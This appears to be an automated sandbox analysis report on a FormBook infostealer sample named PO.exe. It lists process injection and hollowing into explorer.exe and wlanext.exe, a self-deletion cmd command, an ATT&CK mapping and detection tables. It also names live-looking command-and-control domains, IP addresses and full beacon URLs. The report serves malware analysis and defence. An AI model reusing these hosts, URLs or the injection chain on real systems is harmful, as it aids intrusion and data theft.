          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_01BB6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_01BB6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]11_2_01B43D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3AD30 mov eax, dword ptr fs:[00000030h]11_2_01B3AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFE539 mov eax, dword ptr fs:[00000030h]11_2_01BFE539
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BBA537 mov eax, dword ptr fs:[00000030h]11_2_01BBA537
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]11_2_01B64D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]11_2_01B64D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]11_2_01B64D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5C577 mov eax, dword ptr fs:[00000030h]11_2_01B5C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5C577 mov eax, dword ptr fs:[00000030h]11_2_01B5C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B57D50 mov eax, dword ptr fs:[00000030h]11_2_01B57D50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C08D34 mov eax, dword ptr fs:[00000030h]11_2_01C08D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B73D43 mov eax, dword ptr fs:[00000030h]11_2_01B73D43
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB3540 mov eax, dword ptr fs:[00000030h]11_2_01BB3540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BE3D40 mov eax, dword ptr fs:[00000030h]11_2_01BE3D40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C08CD6 mov eax, dword ptr fs:[00000030h]11_2_01C08CD6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4849B mov eax, dword ptr fs:[00000030h]11_2_01B4849B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF14FB mov eax, dword ptr fs:[00000030h]11_2_01BF14FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_01BB6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_01BB6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]11_2_01BB6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6BC2C mov eax, dword ptr fs:[00000030h]11_2_01B6BC2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]11_2_01BB6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]11_2_01BB6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]11_2_01BB6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]11_2_01BB6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]11_2_01BF1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]11_2_01C0740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]11_2_01C0740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]11_2_01C0740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5746D mov eax, dword ptr fs:[00000030h]11_2_01B5746D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BCC450 mov eax, dword ptr fs:[00000030h]11_2_01BCC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BCC450 mov eax, dword ptr fs:[00000030h]11_2_01BCC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6A44B mov eax, dword ptr fs:[00000030h]11_2_01B6A44B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B48794 mov eax, dword ptr fs:[00000030h]11_2_01B48794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]11_2_01BB7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]11_2_01BB7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]11_2_01BB7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B737F5 mov eax, dword ptr fs:[00000030h]11_2_01B737F5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6E730 mov eax, dword ptr fs:[00000030h]11_2_01B6E730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5B73D mov eax, dword ptr fs:[00000030h]11_2_01B5B73D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5B73D mov eax, dword ptr fs:[00000030h]11_2_01B5B73D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B34F2E mov eax, dword ptr fs:[00000030h]11_2_01B34F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B34F2E mov eax, dword ptr fs:[00000030h]11_2_01B34F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5F716 mov eax, dword ptr fs:[00000030h]11_2_01B5F716
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C08F6A mov eax, dword ptr fs:[00000030h]11_2_01C08F6A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BCFF10 mov eax, dword ptr fs:[00000030h]11_2_01BCFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BCFF10 mov eax, dword ptr fs:[00000030h]11_2_01BCFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6A70E mov eax, dword ptr fs:[00000030h]11_2_01B6A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6A70E mov eax, dword ptr fs:[00000030h]11_2_01B6A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C0070D mov eax, dword ptr fs:[00000030h]11_2_01C0070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C0070D mov eax, dword ptr fs:[00000030h]11_2_01C0070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4FF60 mov eax, dword ptr fs:[00000030h]11_2_01B4FF60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4EF40 mov eax, dword ptr fs:[00000030h]11_2_01B4EF40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C08ED6 mov eax, dword ptr fs:[00000030h]11_2_01C08ED6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB46A7 mov eax, dword ptr fs:[00000030h]11_2_01BB46A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BCFE87 mov eax, dword ptr fs:[00000030h]11_2_01BCFE87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B616E0 mov ecx, dword ptr fs:[00000030h]11_2_01B616E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B476E2 mov eax, dword ptr fs:[00000030h]11_2_01B476E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]11_2_01C00EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]11_2_01C00EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]11_2_01C00EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B78EC7 mov eax, dword ptr fs:[00000030h]11_2_01B78EC7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B636CC mov eax, dword ptr fs:[00000030h]11_2_01B636CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BEFEC0 mov eax, dword ptr fs:[00000030h]11_2_01BEFEC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BEFE3F mov eax, dword ptr fs:[00000030h]11_2_01BEFE3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3E620 mov eax, dword ptr fs:[00000030h]11_2_01B3E620
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6A61C mov eax, dword ptr fs:[00000030h]11_2_01B6A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6A61C mov eax, dword ptr fs:[00000030h]11_2_01B6A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]11_2_01B3C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]11_2_01B3C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]11_2_01B3C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B68E00 mov eax, dword ptr fs:[00000030h]11_2_01B68E00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BF1608 mov eax, dword ptr fs:[00000030h]11_2_01BF1608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]11_2_01B5AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]11_2_01B5AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]11_2_01B5AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]11_2_01B5AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]11_2_01B5AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4766D mov eax, dword ptr fs:[00000030h]11_2_01B4766D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]11_2_01B47E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFAE44 mov eax, dword ptr fs:[00000030h]11_2_01BFAE44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFAE44 mov eax, dword ptr fs:[00000030h]11_2_01BFAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02D82ACB mov eax, dword ptr fs:[00000030h]17_2_02D82ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02D82AE4 mov eax, dword ptr fs:[00000030h]17_2_02D82AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02D8D294 mov eax, dword ptr fs:[00000030h]17_2_02D8D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02D8D294 mov eax, dword ptr fs:[00000030h]17_2_02D8D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02D6AAB0 mov eax, dword ptr fs:[00000030h]17_2_02D6AAB0
          Source: C:\Users\user\Desktop\PO.exe; Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\PO.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 172.120.90.239 80
          Source: C:\Windows\explorer.exe; Domain query: www.swpszx.com
          Source: C:\Windows\explorer.exe; Domain query: www.mitraberdaya.com
          Source: C:\Windows\explorer.exe; Network Connect: 5.181.216.112 80
          Source: C:\Windows\explorer.exe; Network Connect: 88.198.220.232 80
          Source: C:\Windows\explorer.exe; Domain query: www.marienish.com
          Source: C:\Windows\explorer.exe; Network Connect: 81.17.18.197 80
          Source: C:\Windows\explorer.exe; Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe; Domain query: www.adanahabernet.com
          Source: C:\Windows\explorer.exe; Domain query: www.sidepiecebags.com
          Source: C:\Windows\explorer.exe; Domain query: www.wwwflixxy.com
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\PO.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\PO.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exe; Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 2A0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\PO.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\PO.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\PO.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 118B008
          Source: C:\Users\user\Desktop\PO.exe; Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\wlanext.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Users\user\Desktop\PO.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts 1 | Shared Modules 1 | Valid Accounts 1 | Valid Accounts 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Valid Accounts 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 812 | Access Token Manipulation 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 31 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 812 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Deobfuscate/Decode Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Obfuscated Files or Information 3 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Software Packing 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph. ID: 385455; Sample: PO.exe; Startdate: 12/04/2021; Architecture: WINDOWS; Score: 100. Process chain: PO.exe (started) -> AddInProcess32.exe (started) -> explorer.exe (injected) -> wlanext.exe (started) -> cmd.exe (started) -> conhost.exe (started). PO.exe dropped C:\Users\user\AppData\...\AddInProcess32.exe (PE32) and C:\Users\user\AppData\Local\...\PO.exe.log (ASCII). explorer.exe contacted www.wwwflixxy.com (81.17.18.197, port 80, PLI-ASCH, Switzerland), www.marienish.com (88.198.220.232, port 80, HETZNER-ASDE, Germany) and 9 other IPs or domains.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PO.exe | 40% | Virustotal |
          PO.exe | 27% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
          PO.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          11.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.adanahabernet.com | 0% | Virustotal |
          td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.adanahabernet.com | 172.120.90.239 | true | true | | unknown
          td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
          mitraberdaya.com | 5.181.216.112 | true | true | | unknown
          www.marienish.com | 88.198.220.232 | true | true | | unknown
          www.wwwflixxy.com | 81.17.18.197 | true | true | | unknown
          www.swpszx.com | unknown | unknown | true | | unknown
          www.sidepiecebags.com | unknown | unknown | true | | unknown
          www.mitraberdaya.com | unknown | unknown | true | | unknown
          www.oaisdjoqwekxc.info | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ | true | Avira URL Cloud: safe | unknown
          http://www.adanahabernet.com/sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw | true | Avira URL Cloud: safe | unknown
